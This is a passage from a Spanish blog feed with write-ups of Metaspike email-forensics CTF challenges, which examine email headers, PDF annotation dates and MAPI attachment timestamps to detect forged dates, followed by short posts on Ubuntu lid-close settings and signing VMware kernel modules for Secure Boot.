<p>Regardless of whether you believe it is legitimate or fake, what is the last modification timestamp you were able to find for the attachment in Part 1?</p>
<p>Enter the timestamp in UTC with 0.1 microsecond precision in the following format: yyyy-mm-dd hh:mm:ss.fffffff (e.g., 2005-11-20 13:17:48.1234567)</p>
</blockquote>
<p>Recuperamos la salida del script de la primera parte con el siguiente contenido:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>┌──<span style="color:#f92672">(</span>kali㉿kali<span style="color:#f92672">)</span>-<span style="color:#f92672">[</span>~/Desktop/msgopen<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>└─$ php ex1.php
</span></span><span style="display:flex;"><span>Message Creation time: 1607983178 <span style="color:#f92672">=</span>&gt; 2020-12-14 16:59:38.000000 EST
</span></span><span style="display:flex;"><span>Message Last modification time: 1607983178 <span style="color:#f92672">=</span>&gt; 2020-12-14, 16:59:38.000000 EST
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>Attachment: FC_4fca-8f34_Specs.txt
</span></span><span style="display:flex;"><span>Attachment creation time: 1591119805 <span style="color:#f92672">=</span>&gt; 2020-06-02 13:43:25.000000 EDT
</span></span><span style="display:flex;"><span>Attachment last modification time: 1591385420 <span style="color:#f92672">=</span>&gt; 2020-06-05 15:30:20.000000 EDT
</span></span><span style="display:flex;"><span>┌──<span style="color:#f92672">(</span>kali㉿kali<span style="color:#f92672">)</span>-<span style="color:#f92672">[</span>~/Desktop/msgopen<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>└─$ 
</span></span></code></pre></div><p>Cuidado con el enunciado que nos pide que demos la respuesta en zona horaria UTC y nosotros tenemos la respuesta en EST/EDT. Podríamos modificar el script anterior para que nos muestre las fechas en UTC pero es mucho más rápido &ldquo;googlear&rdquo; un poco y averiguar que la diferencia horaria es de 4 horas hacia delante desde EST a UTC y sumarlas obteniendo <strong>2020-06-05 19:30:20.0000000</strong> que es la respuesta solicitada.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>CTF- Metaspike - Space invaders (Parte 1)</title>
      <link>https://www.igalvan.es/posts/cft-space-invaders-parte-1/</link>
      <pubDate>Wed, 30 Dec 2020 16:00:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/cft-space-invaders-parte-1/</guid>
      <description><![CDATA[<p>Segundo CTF sobre correo electrónico de Metaspike, en este caso llamado &ldquo;Space Invaders&rdquo;. El reto consta de cuatro partes que iré publicando en sucesivos artículos.</p>
<p>El enunciado de esta primera parte nos dice lo siguiente:</p>
<blockquote>
<p>You are being asked to examine an email1 between two colleagues within the same corporation. The email contains an important business document known to have been created and maintained on a volume formatted with the NT File System (NTFS).</p>
<p>Based on your examination of the email, are the creation and last modification timestamps of the attachment more likely to be legitimate or fake? Enter L for legitimate, F for fake.</p>
<p>1SHA-256: FB42631EC43891EE2D877E02D911 A1FFB95E9B31825986F09DEFE8B9A55F2614</p>
</blockquote>
<p>El primer paso es descargarse el fichero en formato msg. Como siempre usamos el comando <code>sha256sum</code> y comprobamos que el &ldquo;hash&rdquo; coincide.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>──<span style="color:#f92672">(</span>kali㉿kali<span style="color:#f92672">)</span>-<span style="color:#f92672">[</span>~/Desktop/msgopen<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>└─$ sha256sum FW__New_Finite_Curvature_Product_Line_Specs.msg                                                 <span style="color:#ae81ff">127</span> ⨯
</span></span><span style="display:flex;"><span>fb42631ec43891ee2d877e02d911a1ffb95e9b31825986f09defe8b9a55f2614  FW__New_Finite_Curvature_Product_Line_Specs.msg
</span></span><span style="display:flex;"><span>                                                                                                                    
</span></span><span style="display:flex;"><span>┌──<span style="color:#f92672">(</span>kali㉿kali<span style="color:#f92672">)</span>-<span style="color:#f92672">[</span>~/Desktop/msgopen<span style="color:#f92672">]</span>
</span></span></code></pre></div><p>El siguiente paso lógico sería pasar por VirusTotal el fichero para ver si tiene algo raro dentro pero vamos a omitir este paso porque ya sabemos que es algo que todos hacemos antes de abrir un fichero. :wink:</p>
<p>Aquí lo normal sería utilizar alguna herramienta para Windows y poder husmear dentro de las propiedades MAPI del fichero pero como a mí me gusta hacer las cosas al &ldquo;estilo software libre&rdquo; voy a usar una librería de PHP llamada <code>hfig/mapi</code> (<a href="https://github.com/hfig/MAPI">https://github.com/hfig/MAPI</a>) en un pequeño script. Aquí os dejo su contenido:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#f92672">&lt;?</span><span style="color:#a6e22e">php</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">require</span> <span style="color:#e6db74">&#39;vendor/autoload.php&#39;</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">use</span> <span style="color:#a6e22e">Hfig\MAPI</span>;
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">use</span> <span style="color:#a6e22e">Hfig\MAPI\OLE\Pear</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">// message parsing and file IO are kept separate
</span></span></span><span style="display:flex;"><span>$messageFactory <span style="color:#f92672">=</span> <span style="color:#66d9ef">new</span> <span style="color:#a6e22e">MAPI\MapiMessageFactory</span>();
</span></span><span style="display:flex;"><span>$documentFactory <span style="color:#f92672">=</span> <span style="color:#66d9ef">new</span> <span style="color:#a6e22e">Pear\DocumentFactory</span>(); 
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>$ole <span style="color:#f92672">=</span> $documentFactory<span style="color:#f92672">-&gt;</span><span style="color:#a6e22e">createFromFile</span>(<span style="color:#e6db74">&#39;FW__New_Finite_Curvature_Product_Line_Specs.msg&#39;</span>);
</span></span><span style="display:flex;"><span>$message <span style="color:#f92672">=</span> $messageFactory<span style="color:#f92672">-&gt;</span><span style="color:#a6e22e">parseMessage</span>($ole);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>$dateToPrint <span style="color:#f92672">=</span> <span style="color:#a6e22e">date_create</span>();
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">date_timestamp_set</span>($dateToPrint, $message<span style="color:#f92672">-&gt;</span><span style="color:#a6e22e">properties</span>[<span style="color:#e6db74">&#39;creation_time&#39;</span>]);
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">echo</span> <span style="color:#e6db74">&#39;Message Creation time: &#39;</span>, <span style="color:#a6e22e">date_format</span>($dateToPrint,<span style="color:#e6db74">&#39;U =&gt; Y-m-d H:i:s.u T&#39;</span>), <span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>;
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">date_timestamp_set</span>($dateToPrint, $message<span style="color:#f92672">-&gt;</span><span style="color:#a6e22e">properties</span>[<span style="color:#e6db74">&#39;last_modification_time&#39;</span>]);
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">echo</span> <span style="color:#e6db74">&#39;Message Last modification time: &#39;</span>, <span style="color:#a6e22e">date_format</span>($dateToPrint, <span style="color:#e6db74">&#39;U =&gt; Y-m-d, H:i:s.u T&#39;</span>), <span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n\n</span><span style="color:#e6db74">&#34;</span>;
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">foreach</span> ($message<span style="color:#f92672">-&gt;</span><span style="color:#a6e22e">getAttachments</span>() <span style="color:#66d9ef">as</span> $attachment) {
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">echo</span> <span style="color:#e6db74">&#39;Attachment: &#39;</span>, $attachment<span style="color:#f92672">-&gt;</span><span style="color:#a6e22e">properties</span>[<span style="color:#e6db74">&#39;display_name&#39;</span>], <span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>;
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">date_timestamp_set</span>($dateToPrint, $attachment<span style="color:#f92672">-&gt;</span><span style="color:#a6e22e">properties</span>[<span style="color:#e6db74">&#39;creation_time&#39;</span>]);
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">echo</span> <span style="color:#e6db74">&#39;Attachment creation time: &#39;</span>, <span style="color:#a6e22e">date_format</span>($dateToPrint,<span style="color:#e6db74">&#39;U =&gt; Y-m-d H:i:s.u T&#39;</span>), <span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>;
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">date_timestamp_set</span>($dateToPrint, $attachment<span style="color:#f92672">-&gt;</span><span style="color:#a6e22e">properties</span>[<span style="color:#e6db74">&#39;last_modification_time&#39;</span>]);
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">echo</span> <span style="color:#e6db74">&#39;Attachment last modification time: &#39;</span>, <span style="color:#a6e22e">date_format</span>($dateToPrint,<span style="color:#e6db74">&#39;U =&gt; Y-m-d H:i:s.u T&#39;</span>), <span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>;
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span><span style="color:#75715e">?&gt;</span><span style="color:#960050;background-color:#1e0010">
</span></span></span></code></pre></div><p>Tras ejecutarlo la salida que muestra es la siguiente:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>┌──<span style="color:#f92672">(</span>kali㉿kali<span style="color:#f92672">)</span>-<span style="color:#f92672">[</span>~/Desktop/msgopen<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>└─$ php ex1.php
</span></span><span style="display:flex;"><span>Message Creation time: 1607983178 <span style="color:#f92672">=</span>&gt; 2020-12-14 16:59:38.000000 EST
</span></span><span style="display:flex;"><span>Message Last modification time: 1607983178 <span style="color:#f92672">=</span>&gt; 2020-12-14, 16:59:38.000000 EST
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>Attachment: FC_4fca-8f34_Specs.txt
</span></span><span style="display:flex;"><span>Attachment creation time: 1591119805 <span style="color:#f92672">=</span>&gt; 2020-06-02 13:43:25.000000 EDT
</span></span><span style="display:flex;"><span>Attachment last modification time: 1591385420 <span style="color:#f92672">=</span>&gt; 2020-06-05 15:30:20.000000 EDT
</span></span><span style="display:flex;"><span>┌──<span style="color:#f92672">(</span>kali㉿kali<span style="color:#f92672">)</span>-<span style="color:#f92672">[</span>~/Desktop/msgopen<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>└─$ 
</span></span></code></pre></div><p>Aunque no lo pueda demostrar fehacientemente, <strong>es bastante probable que se hayan modificado las fechas de creación y modificación</strong> de este correo y de sus adjuntos porque es muy poco probable que todas estas acciones se realicen justo en el microsegundo cero.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>CTF- Metaspike - It&#39;s about time (Parte 2)</title>
      <link>https://www.igalvan.es/posts/cft-its-about-time-parte-2/</link>
      <pubDate>Tue, 29 Dec 2020 15:10:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/cft-its-about-time-parte-2/</guid>
      <description><![CDATA[<p>Tal y como os prometí, aquí os dejo la segunda parte de este CTF.</p>
<p>El enunciado nos dice lo siguiente:</p>
<blockquote>
<p>Congrats on making that determination! You are now asked to take this a step further, and determine the earliest date and time the email could have been sent based on the timing information you can locate within the file.</p>
<p>You will be examining the same email1. Included here again for convenience.</p>
<p>1SHA-256: 42B6FD78DAF38C03E1A744ECA1A0CB 44F6859AB892E0F32B01763EFD835B5648</p>
<p>Enter the timestamp in UTC in the following format: yyyy-mm-dd hh:mm (e.g., 2005-11-20 13:17)</p>
</blockquote>
<p>Ya nos habíamos descargado el fichero pero si no lo tenemos lo podemos descargar otra vez desde este mismo reto. Como siempre usamos el comando <code>sha256sum</code> y comprobamos que el &ldquo;hash&rdquo; coincide.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#f92672">(</span>kali㉿kali<span style="color:#f92672">)</span>-<span style="color:#f92672">[</span>~/Desktop<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>└─$ sha256sum Draft_Agreement.eml 
</span></span><span style="display:flex;"><span>42b6fd78daf38c03e1a744eca1a0cb44f6859ab892e0f32b01763efd835b5648  Draft_Agreement.eml
</span></span><span style="display:flex;"><span>                                                                           
</span></span><span style="display:flex;"><span>┌──<span style="color:#f92672">(</span>kali㉿kali<span style="color:#f92672">)</span>-<span style="color:#f92672">[</span>~/Desktop<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>└─$ 
</span></span></code></pre></div><p>El siguiente paso lógico sería pasar por VirusTotal el fichero para ver si tiene algo raro dentro pero vamos a omitir este paso porque ya sabemos que es algo que todos hacemos antes de abrir un fichero. :wink:</p>
<p>Nos están pidiendo la primera fecha en la que el correo pudo ser enviada. Como ya sabemos del artículo anterior no es posible que podamos obtener ese dato de las cabeceras del correo electrónico, pero si recordáis en el correo había un fichero adjunto llamado &ldquo;Agreement_v2.pdf&rdquo;.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>──<span style="color:#f92672">(</span>kali㉿kali<span style="color:#f92672">)</span>-<span style="color:#f92672">[</span>~/Desktop<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>└─$ grep <span style="color:#e6db74">&#39;Content-&#39;</span> Draft_Agreement.eml                              <span style="color:#ae81ff">130</span> ⨯
</span></span><span style="display:flex;"><span>Content-Type: multipart/mixed; 
</span></span><span style="display:flex;"><span>Content-Length: <span style="color:#ae81ff">70085</span>
</span></span><span style="display:flex;"><span>Content-Type: multipart/alternative; 
</span></span><span style="display:flex;"><span>Content-Type: text/plain; charset<span style="color:#f92672">=</span>UTF-8
</span></span><span style="display:flex;"><span>Content-Transfer-Encoding: 7bit
</span></span><span style="display:flex;"><span>Content-Type: text/html; charset<span style="color:#f92672">=</span>UTF-8
</span></span><span style="display:flex;"><span>Content-Transfer-Encoding: 7bit
</span></span><span style="display:flex;"><span>Content-Type: application/pdf
</span></span><span style="display:flex;"><span>Content-Transfer-Encoding: base64
</span></span><span style="display:flex;"><span>Content-Disposition: attachment; filename<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;Agreement_v2.pdf&#34;</span>
</span></span><span style="display:flex;"><span>Content-ID: &lt;bd1c0c4c-3c0e-20e0-f6b2-5bc858aab23a@yahoo.com&gt;
</span></span></code></pre></div><p>Vamos a separarlo utilizando el comando <code>munpack</code> para poder manipularlo. Por cierto, en Kali no viene instalado por defecto y es necesario instalar el paquete <code>mpack</code>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>──<span style="color:#f92672">(</span>kali㉿kali<span style="color:#f92672">)</span>-<span style="color:#f92672">[</span>~/Desktop<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>└─$ sudo munpack Draft_Agreement.eml
</span></span><span style="display:flex;"><span>tempdesc.txt: File exists
</span></span><span style="display:flex;"><span><span style="color:#f92672">)</span>greement_v2.pdf.1 <span style="color:#f92672">(</span>application/pdf
</span></span><span style="display:flex;"><span>                                                                           
</span></span><span style="display:flex;"><span>┌──<span style="color:#f92672">(</span>kali㉿kali<span style="color:#f92672">)</span>-<span style="color:#f92672">[</span>~/Desktop<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>└─$ 
</span></span></code></pre></div><p>Yo no tengo ganas de abrir el fichero porque ya sabemos las cosas malas que se pueden meter en un PDF y además dudo que sea tan sencillo de resolver como visualizar el fichero. Sin embargo, sí hay algo que sabemos de antes que nos puede ayudar. ¿Recordáis la fecha de la versión de Chrome que vimos en la cabecera &ldquo;X-Mailer&rdquo;? Pues vamos a rastrear el fichero PDF del adjunto para ver si podemos obtener cadenas de texto que hagan referencia al año 2020 mediante el comando <code>pdf-parser</code>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#f92672">(</span>kali㉿kali<span style="color:#f92672">)</span>-<span style="color:#f92672">[</span>~/Desktop<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>└─$ pdf-parser Agreement_v2.pdf|grep -B10 <span style="color:#ae81ff">2020</span>
</span></span><span style="display:flex;"><span> Type: /Annot
</span></span><span style="display:flex;"><span> Referencing: <span style="color:#ae81ff">46</span> <span style="color:#ae81ff">0</span> R, <span style="color:#ae81ff">9</span> <span style="color:#ae81ff">0</span> R
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  &lt;&lt;
</span></span><span style="display:flex;"><span>    /AP
</span></span><span style="display:flex;"><span>      &lt;&lt;
</span></span><span style="display:flex;"><span>        /N <span style="color:#ae81ff">46</span> <span style="color:#ae81ff">0</span> R
</span></span><span style="display:flex;"><span>      &gt;&gt;
</span></span><span style="display:flex;"><span>    /C <span style="color:#f92672">[</span>1.0 1.0 1.0<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>    /Contents <span style="color:#f92672">(</span>Dean Vinny<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>    /CreationDate <span style="color:#e6db74">&#34;(D:20201206151800-08&#39;00&#39;)&#34;</span>
</span></span><span style="display:flex;"><span>    /DA <span style="color:#f92672">(</span>0.898 0.1333 0.2157 rg /Helv <span style="color:#ae81ff">12</span> Tf<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>    /DS <span style="color:#f92672">(</span>font: Helvetica,sans-serif 12.0pt; text-align:left; color:#E52237 <span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>    /F <span style="color:#ae81ff">4</span>
</span></span><span style="display:flex;"><span>    /M <span style="color:#e6db74">&#34;(D:20201206151937-08&#39;00&#39;)&#34;</span>
</span></span></code></pre></div><p>Aquí tenemos dos fechas muy interesantes. Si nos fijamos en el resultado se ve el contenido de una anotación cuyo contenido es el nombre de la persona y además dos fechas casi seguidas. La primera se corresponde con la fecha de creación de la anotación y la segunda con la fecha de la última modificación de esa anotación. Vamos a coger la segunda fecha porque parece difícil que se puede enviar un fichero antes de terminar de editarlo. En esta fecha que fijarse que es necesario calcular la diferencia horaria para sumarla a la hora y con eso ya tendríamos la respuesta, <strong>el 6 de diciembre de 2020 a las 23:19</strong>.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>CTF- Metaspike - It&#39;s about time (Parte 1)</title>
      <link>https://www.igalvan.es/posts/cft-its-about-time-parte-1/</link>
      <pubDate>Mon, 28 Dec 2020 19:45:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/cft-its-about-time-parte-1/</guid>
      <description><![CDATA[<p>Aquí va como resolver un CTF sencillo sobre un mensaje de correo electrónico. Tiene dos preguntas sencillas que no requieren mucho conocimiento técnico pero sí ser un poco avispado. En este artículo resolveré la primera y en breve publicaré la segunda parte. Como siempre yo voy a usar una máquina virtual con Kali Linux básicamente para no ejecutar nada en mi equipo real y menos si proviene de un CTF. :stuck_out_tongue_winking_eye:</p>
<p>El enunciado nos dice lo siguiente:</p>
<blockquote>
<p>You have received the email1 below in connection with a legal action. The timing of the email is critical. Examine the email and determine if it is more likely to be legitimate or fake.</p>
<p>Enter L for legitimate, F for fake. More to come based on your answer.</p>
<p>SHA-256: 42B6FD78DAF38C03E1A744ECA1A0CB 44F6859AB892E0F32B01763EFD835B5648</p>
</blockquote>
<p>Si nos descargamos el fichero EML, el primer paso como siempre es comprobar la suma SHA256. Para ello usamos el comando <code>sha256sum</code> y comprobamos que el &ldquo;hash&rdquo; coincide.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#f92672">(</span>kali㉿kali<span style="color:#f92672">)</span>-<span style="color:#f92672">[</span>~/Desktop<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>└─$ sha256sum Draft_Agreement.eml 
</span></span><span style="display:flex;"><span>42b6fd78daf38c03e1a744eca1a0cb44f6859ab892e0f32b01763efd835b5648  Draft_Agreement.eml
</span></span><span style="display:flex;"><span>                                                                           
</span></span><span style="display:flex;"><span>┌──<span style="color:#f92672">(</span>kali㉿kali<span style="color:#f92672">)</span>-<span style="color:#f92672">[</span>~/Desktop<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>└─$ 
</span></span></code></pre></div><p>El siguiente paso lógico sería pasar por VirusTotal el fichero para ver si tiene algo raro dentro pero vamos a omitir este paso porque ya sabemos que es algo que todos hacemos antes de abrir un fichero. :wink:</p>
<p>Yo prefiero usar un editor de textos para abrir los ficheros EML y así poder revisar tranquilamente su contenido. En este artículo voy a utilizar el comando <code>grep</code> para simplificar su redacción.</p>
<p>A primera vista las cabeceras que contienen fechas parecen legitimas y están sincronizadas por lo que el correo parece provenir del 7 de marzo de 2016, pero aquí tiene que haber algún truco, no me creo que sea tan sencillo.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>──<span style="color:#f92672">(</span>kali㉿kali<span style="color:#f92672">)</span>-<span style="color:#f92672">[</span>~/Desktop<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>└─$ grep Mar Draft_Agreement.eml
</span></span><span style="display:flex;"><span>        Mon, <span style="color:#ae81ff">7</span> Mar <span style="color:#ae81ff">2016</span> 14:38:34 -0800 <span style="color:#f92672">(</span>PST<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>        Mon, <span style="color:#ae81ff">07</span> Mar <span style="color:#ae81ff">2016</span> 14:38:34 -0800 <span style="color:#f92672">(</span>PST<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>        Mon, <span style="color:#ae81ff">07</span> Mar <span style="color:#ae81ff">2016</span> 14:38:34 -0800 <span style="color:#f92672">(</span>PST<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>Received: from sonic.gate.mail.ne1.yahoo.com by sonic306.consmr.mail.bf2.yahoo.com with HTTP; Mon, <span style="color:#ae81ff">7</span> Mar <span style="color:#ae81ff">2016</span> 22:38:33 +0000
</span></span><span style="display:flex;"><span>Date: Mon, <span style="color:#ae81ff">7</span> Mar <span style="color:#ae81ff">2016</span> 22:38:31 +0000 <span style="color:#f92672">(</span>UTC<span style="color:#f92672">)</span>
</span></span></code></pre></div><p>Comprobando el resto de cabeceras vemos que hay una interesante, la que se corresponde con &ldquo;X-Mailer&rdquo; que habla de la versión 87.0.4280.67  de Chrome y de Edge basado en Chromium tal y como se puede ver en la siguiente captura.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>┌──<span style="color:#f92672">(</span>kali㉿kali<span style="color:#f92672">)</span>-<span style="color:#f92672">[</span>~/Desktop<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>└─$ grep <span style="color:#e6db74">&#39;X-Mailer&#39;</span> Draft_Agreement.eml        
</span></span><span style="display:flex;"><span>X-Mailer: WebService/1.1.17111 YMailNorrin Mozilla/5.0 <span style="color:#f92672">(</span>Windows NT 10.0; Win64; x64<span style="color:#f92672">)</span> AppleWebKit/537.36 <span style="color:#f92672">(</span>KHTML, like Gecko<span style="color:#f92672">)</span> Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.55
</span></span></code></pre></div><p>Aquí hay algo raro. Si buscamos en Google podemos confirmar que esa versión de Chrome es del 17 de noviembre de 2020, con lo que es imposible que el correo sea del año 2016.</p>
<p><img src="%7B%7Bsite.url%7D%7D/assets/fecha_salida_chrome.png" alt="fecha_salida_chrome.png"></p>
<p>¡Bingo! Ya tenemos la prueba para demostrar que la fecha del correo fue alterada.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Cómo cambiar el comportamiento del cierre de la tapa del portátil en Ubuntu</title>
      <link>https://www.igalvan.es/posts/cambio-comportamiento-cerrar-tapa-ubuntu/</link>
      <pubDate>Mon, 14 Dec 2020 16:00:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/cambio-comportamiento-cerrar-tapa-ubuntu/</guid>
      <description><![CDATA[<p>Ahora mismo estoy usando un portátil con Kubuntu 20.04 como equipo principal conectado a un monitor panorámico para mi uso personal y por problemas de espacio me he encontrado con la tesitura de tener que &ldquo;achicar huecos&rdquo;. El problema viene que en los portatiles cuando cierras la tapa el comportamiento por defecto es suspender el equipo y eso no es una buena idea cuando quieres seguir trabajando con él.</p>
<p>Con este pequeño cambio en el fichero <code>/etc/systemd/logind.conf</code> se puede alterar el comportamiento por defecto y, en mi caso, no haga nada. La verdad es que se puede configurar cualquiera de las siguientes cinco opciones:</p>
<ul>
<li><code>HandleLidSwitch=suspend</code>. Suspende el equipo y es el comportamiento por defecto.</li>
<li><code>HandleLidSwitch=lock</code>. Bloquea la pantalla.</li>
<li><code>HandleLidSwitch=ignore</code>. No hace nada, que sería el comportamiento que yo quiero utilizar.</li>
<li><code>HandleLidSwitch=poweroff</code>. Apaga el equipo.</li>
<li><code>HandleLidSwitch=hibernate</code>. Hiberna el equipo.</li>
</ul>
<p>El proceso es sencillo, hay que editar el fichero /etc/systemd/logind.conf con permisos de root y buscar la línea que pone <code>#HandleLidSwitch=suspend</code> y cambiarla por cualquiera de las cinco de arriba según corresponda.</p>
<p>![fichero logind.conf]({{ site.url }}/assets/fichero_logind.png)</p>
<p>Después solo hay que reiniciar el servicio logind mediante el siguiente comando y ya hemos terminado.</p>
<pre tabindex="0"><code>systemctl restart systemd-logind.service
</code></pre>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Problemas con VMWare Workstation en Linux para cargar los módulos vmmon and vmnet utilizando Secure Boot</title>
      <link>https://www.igalvan.es/posts/workstation-fail-vmmon-vmnet-secure-boot/</link>
      <pubDate>Wed, 09 Dec 2020 11:00:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/workstation-fail-vmmon-vmnet-secure-boot/</guid>
      <description><![CDATA[<p>Si tienes una máquina virtual ejecutándose sobre Vmware Workstation en un anfitrión GNU/Linux que utilice UEFI con el arranque seguro activado vas a tener problemas con la carga de los módulos vmmon y vmnet. Verás el siguiente mensaje:</p>
<pre tabindex="0"><code>Cannot open /dev/vmmon: No such file or directory. Please make sure that the kernel module `vmmon&#39; is loaded
</code></pre><p>Esto sucede porque el arranque seguro requiere que estos módulos estén firmados para poder cargarlos y esto no es posible porque estos módulos se compilan durante la instalación del producto.
La solución es sencilla pero un poco tediosa porque tendrás que realizarla cada vez que alguno de estos módulos se actualice. Los pasos son los siguientes:</p>
<p>El primer paso es generar el juego de claves mediante openssl que posteriormente se usará para firmar los módulos mediante el siguiente comando:</p>
<pre tabindex="0"><code>$openssl req -new -x509 -newkey rsa:2048 -keyout MOK.priv -outform DER -out MOK.der -nodes -days 36500 -subj &#34;/CN=VMware/&#34;
</code></pre><p>A continuación tienes que firmar los módulos mediante los siguientes comandos:</p>
<pre tabindex="0"><code>$sudo /usr/src/linux-headers-`uname -r`/scripts/sign-file sha256 ./MOK.priv ./MOK.der $(modinfo -n vmmon)

$sudo /usr/src/linux-headers-`uname -r`/scripts/sign-file sha256 ./MOK.priv ./MOK.der $(modinfo -n vmnet)
</code></pre><p>Este paso solo hay que hacerlo la primera vez o cuando se genere un juego de claves nuevo, por ejemplo, si has perdido el anterior. Te solicitará una contraseña para el registro de la clave en la UEFI y que debes recordar.</p>
<pre tabindex="0"><code>$mokutil --import MOK.der 
</code></pre><p>Por último, tienes que reiniciar el equipo y seguir las instrucciones especificas de la UEFI de tu equipo.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Yo, robot</title>
      <link>https://www.igalvan.es/posts/yo-robot/</link>
      <pubDate>Wed, 05 Aug 2020 19:35:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/yo-robot/</guid>
      <description><![CDATA[<p>Otra vez de vuelta con una breve recomendación de un libro que me ha encantado. Sí, ya lo sé, he vuelto tantas veces que soy como los gatos, tengo siete vidas.</p>
